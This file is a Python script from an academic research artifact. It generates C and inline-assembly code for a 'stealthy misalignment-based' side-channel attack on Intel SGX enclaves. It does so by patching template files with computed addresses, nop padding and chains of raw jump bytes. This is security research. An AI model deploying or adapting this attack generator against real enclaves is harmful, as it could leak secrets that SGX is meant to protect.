#!/bin/bash

# SGX non multi-threading (non-MT) stealthy misalignment-based attack

# Usage: see README (step 5) in the top level 
# Authors: 
# Shuwen Deng (shuwen.deng@yale.edu)
# Bowen Huang (bowen.huang@yale.edu)
# Jakub Szefer (jakub.szefer@yale.edu)


import sys

res_1 = []
res_2 = []
x=[]
count=0
jmp_count=1;
jmp_num=int(sys.argv[2]) # 8
interval = 32 # 32
set_order=int(sys.argv[1])
inc_set=int(sys.argv[3])
input_extra_set=int(sys.argv[4])


first_align=0 	
second_align=0
not_misaligned=first_align
second_not_misaligned=second_align
added_first_access=2
last_not_map=0
no_function=0
sgx_second_not_map=0


filename_list=['main_0520.cxx', 'encl_0311.cxx']
filename_w_list=['main.c', 'Enclave/encl.c']

count_list=[360,240] 
file_num=2
if no_function==1:
    file_num=1
for file_index in range(file_num): 
    if no_function==0:
        count=0
    outF = open(filename_w_list[file_index], "w")
    with open(filename_list[file_index]) as infile: #Iterate each line
        for line in infile:            
            address_hex=0x000000A3+(11+set_order+3)*32-8+3-377+inc_set*32+1+43-23-2 -17 -115+6-31 +0 +192 +16+32 +272   -(16)*not_misaligned  
            hex0="{0:#0{1}x}".format(address_hex&0xff,4)
            hex1="{0:#0{1}x}".format((address_hex>>8)&0xff,4)
            hex2="{0:#0{1}x}".format((address_hex>>16)&0xff,4)
            hex3="{0:#0{1}x}".format((address_hex>>24)&0xff,4)
            address_hex2=0x000000A3+(11+set_order+3)*32-8+3-377+1*32+1+43-23-2 -17 -115+6-31 +0 +192 +1040+27 +added_first_access*1024 -2715 -16    +(no_function)*(320-32+64)  
            hex02="{0:#0{1}x}".format(address_hex2&0xff,4)
            hex12="{0:#0{1}x}".format((address_hex2>>8)&0xff,4)
            hex22="{0:#0{1}x}".format((address_hex2>>16)&0xff,4)
            hex32="{0:#0{1}x}".format((address_hex2>>24)&0xff,4)
            address_hex3=0x000000A3+(11+set_order+3)*32-8+3-377+inc_set*32+1+43-23-2 -17 -115+6-31 +0 +192 +1040+27 +added_first_access*1024 -2715 -16    +(no_function)*(320-32+64) +10240-96 		-32*32*(10-jmp_num)			
            hex03="{0:#0{1}x}".format(address_hex3&0xff,4)
            hex13="{0:#0{1}x}".format((address_hex3>>8)&0xff,4)
            hex23="{0:#0{1}x}".format((address_hex3>>16)&0xff,4)
            hex33="{0:#0{1}x}".format((address_hex3>>24)&0xff,4)
            added_nop="\"nop\\n\""*(17-9	  +699	+no_function*( 3 -64)  +no_function*(1-file_index)*41 - (1-no_function)*(1-file_index)*532  )
            added_nop2="\"nop\\n\""*(27-16+5		+no_function*(64) )
            added_nop3="\"nop\\n\""*(3+20			+ (1-no_function)*file_index*4    -5 +int(sys.argv[7]) ) #  +int(sys.argv[6]) -5)
            added_nop4="\"nop\\n\""*(17+6+16  +int(sys.argv[6]))
            added_nop5="\"nop\\n\""*(17)
            if "//addr5" in line:
                outF.write("			    \".byte "+hex02+" \\n\" //addr5\n");
            elif "//addr6" in line:
                outF.write("			    \".byte "+hex12+" \\n\" //addr6\n");
            elif "//addr7" in line:
                outF.write("			    \".byte "+hex22+" \\n\" //addr7\n");
            elif "//addr8" in line:
                outF.write("			    \".byte "+hex32+" \\n\" //addr8\n");
            elif "//addr9" in line:
                outF.write("			    \".byte "+hex03+" \\n\" //addr9\n");
            elif "//addrA" in line:
                outF.write("			    \".byte "+hex13+" \\n\" //addrA\n");
            elif "//addrB" in line:
                outF.write("			    \".byte "+hex23+" \\n\" //addrB\n");
            elif "//addrC" in line:
                outF.write("			    \".byte "+hex33+" \\n\" //addrC\n");
            elif "// insert nop1" in line:
                outF.write("			asm volatile (" +added_nop+ ");// insert nop1\n");
            elif "// insert nop2" in line:
                outF.write("			asm volatile (" +added_nop2+ ");// insert nop2\n");
            elif "// insert nop3" in line:
                outF.write("                        asm volatile (" +added_nop3+ ");// insert nop3\n");
            elif "// insert nop4" in line:
                outF.write("                        asm volatile (" +added_nop4+ ");// insert nop4\n");
            elif "// insert nop5" in line:
                outF.write("                        asm volatile (" +added_nop5+ ");// insert nop5\n");
            else:
                outF.write(line)
            
            jump_interval=32
            jump_index=[539+interval*(jump_interval)*(1-1)+set_order*32-8+3*32+3-377+1*32+1+43-23-2 -17 -115+6-31+192+16+32 -(16)*not_misaligned +added_first_access*1024  +1702-1430    +7232 -32*32*(10-jmp_num), 
            539+interval*(jump_interval)*(jmp_num-1)+set_order*32-8+3*32+3-377+inc_set*32+1+43-23-2 -17 -115+6-31+192+16+32+744+248+27-16*second_not_misaligned +added_first_access*1024  -9000+6285 + last_not_map*32*4*(jmp_num>1)     +no_function*(288+64) +10144   +sgx_second_not_map*32*3*(jmp_num>1)  -32*32*(10-jmp_num)  ]
            jmp_array=[jmp_num, jmp_num] 
            
            if count==count_list[file_index]: 
                set_num=1
                if (file_index==1 and no_function==1) or (file_index==0 and no_function==0):
                    set_num=0
                elif (file_index==1 and no_function==0) or (file_index==0 and no_function==1):
                    set_num=1
                
                for set_num in range(2*(file_index)): 
                    outF.write("int assist_funct_set"+str(set_num+1)+"(void){\n");  
                    outF.write("    asm __volatile (\n");
                    
                    for j in range((11+set_order+3)*32-8+3-377+(inc_set*32*(set_num)+(1-set_num)*32)		+1+43-23-115+6-31+19-26+16+(1-set_num)*16*(1-not_misaligned)+(1-set_num)*(3)+set_num*(972-16  +(16)*(not_misaligned)-246-5			-16   +no_function*(-337-32))   +(1-set_num)*(1-no_function)*(13+499-int(sys.argv[6])) + (1-set_num)*(1-no_function)*(62) +set_num*(1-no_function)*(283+int(sys.argv[6]))): 
                        outF.write("		\".byte 0x90 \\n\"//mov\n");  
                    
                    outF.write("        );  \n");
                    outF.write("        asm __volatile (\n");
                    outF.write("            \"mov    $3, %%esi \\n\" \n");
                    outF.write("            \"mov    $3, %%ecx \\n\" \n");
                    outF.write("        :::);  \n");
                    outF.write("        asm __volatile (\n");
                    outF.write("		\".byte 0xbb \\n\"\n");
                    outF.write("		\".byte 0x01 \\n\"\n");
                    outF.write("		\".byte 0x00 \\n\"\n");
                    outF.write("		\".byte 0x00 \\n\"\n");
                    outF.write("		\".byte 0x00 \\n\" // mov ebx\n");
                    outF.write("		\".byte 0xba \\n\"\n");
                    outF.write("		\".byte 0x01 \\n\"\n");
                    outF.write("		\".byte 0x00 \\n\"\n");
                    outF.write("		\".byte 0x00 \\n\"\n");
                    outF.write("		\".byte 0x00 \\n\" // mov edx\n");
                    
                    for i in range(jmp_array[set_num]-1):
                        outF.write("\n		\".byte 0xe9 \\n\"\n");
                        pre_len=20 
                        original=0x00000000; 
                        curr=original+interval*jump_interval-pre_len-5; 
                        if set_num==1 and last_not_map==1 and i==jmp_array[set_num]-2:
                            curr=curr+32*4
                        if set_num==1 and sgx_second_not_map==1 and i==jmp_array[set_num]-1-(jmp_num-6):
                            curr=curr+32*3 
                        if i==jmp_array[set_num]-4 and set_num==1 and last_not_map==0 and second_not_misaligned==0:
                            curr=curr+16
                        hex0="{0:#0{1}x}".format(curr&0xff,4)
                        hex1="{0:#0{1}x}".format((curr>>8)&0xff,4)
                        hex2="{0:#0{1}x}".format((curr>>16)&0xff,4)
                        hex3="{0:#0{1}x}".format((curr>>24)&0xff,4)
                        outF.write("		\".byte "+hex0+" \\n\"\n");
                        outF.write("		\".byte "+hex1+" \\n\"\n");
                        outF.write("		\".byte "+hex2+" \\n\"\n");
                        outF.write("		\".byte "+hex3+" \\n\"\n");
                        for j in range(interval*(jump_interval)-pre_len-5):
                            outF.write("		\".byte 0x90 \\n\"//mov\n");  
                        if (i==jmp_array[set_num]-2 and set_num==1 and last_not_map==1):
                            for j in range(32*4): 
                                outF.write("            \".byte 0x90 \\n\"//mov\n");
                        if (i==jmp_array[set_num]-1-(jmp_num-6) and set_num==1 and sgx_second_not_map==1):
                            for j in range(32*3): #4): 
                                outF.write("            \".byte 0x90 \\n\"//mov\n");
                        if (i==jmp_array[set_num]-4 and set_num==1 and last_not_map==0 and second_not_misaligned==0):
                            for j in range(16): 
                                outF.write("            \".byte 0x90 \\n\"//mov\n");
                        outF.write("        );  \n");
                        outF.write("        asm __volatile (\n");
                        outF.write("            \"mov    $3, %%esi \\n\" \n");
                        outF.write("            \"mov    $3, %%ecx \\n\" \n"); 
                        
                        outF.write("        :::);  \n");
                        outF.write("        asm __volatile (\n");
                        
                        outF.write("		\".byte 0xbb \\n\"\n");
                        outF.write("		\".byte 0x01 \\n\"\n");
                        outF.write("		\".byte 0x00 \\n\"\n");
                        outF.write("		\".byte 0x00 \\n\"\n");
                        outF.write("		\".byte 0x00 \\n\" // mov ebx\n");
                        outF.write("		\".byte 0xba \\n\"\n");
                        outF.write("		\".byte 0x01 \\n\"\n");
                        outF.write("		\".byte 0x00 \\n\"\n");
                        outF.write("		\".byte 0x00 \\n\"\n");
                        outF.write("		\".byte 0x00 \\n\" // mov edx\n");
                        
                    outF.write("\n		\".byte 0xe9 \\n\" //final jump\n");
                    original=0xffffffff; 
                    curr=original-jump_index[set_num] 
                    hex0="{0:#0{1}x}".format(curr&0xff,4)
                    hex1="{0:#0{1}x}".format((curr>>8)&0xff,4)
                    hex2="{0:#0{1}x}".format((curr>>16)&0xff,4)
                    hex3="{0:#0{1}x}".format((curr>>24)&0xff,4)
                    outF.write("		\".byte "+hex0+" \\n\"\n");
                    outF.write("		\".byte "+hex1+" \\n\"\n");
                    outF.write("		\".byte "+hex2+" \\n\"\n");
                    outF.write("		\".byte "+hex3+" \\n\"\n");
                    
                    outF.write("    );\n");  
                    outF.write("}\n\n"); 
                    
            count+=1


infile.close()
outF.close()
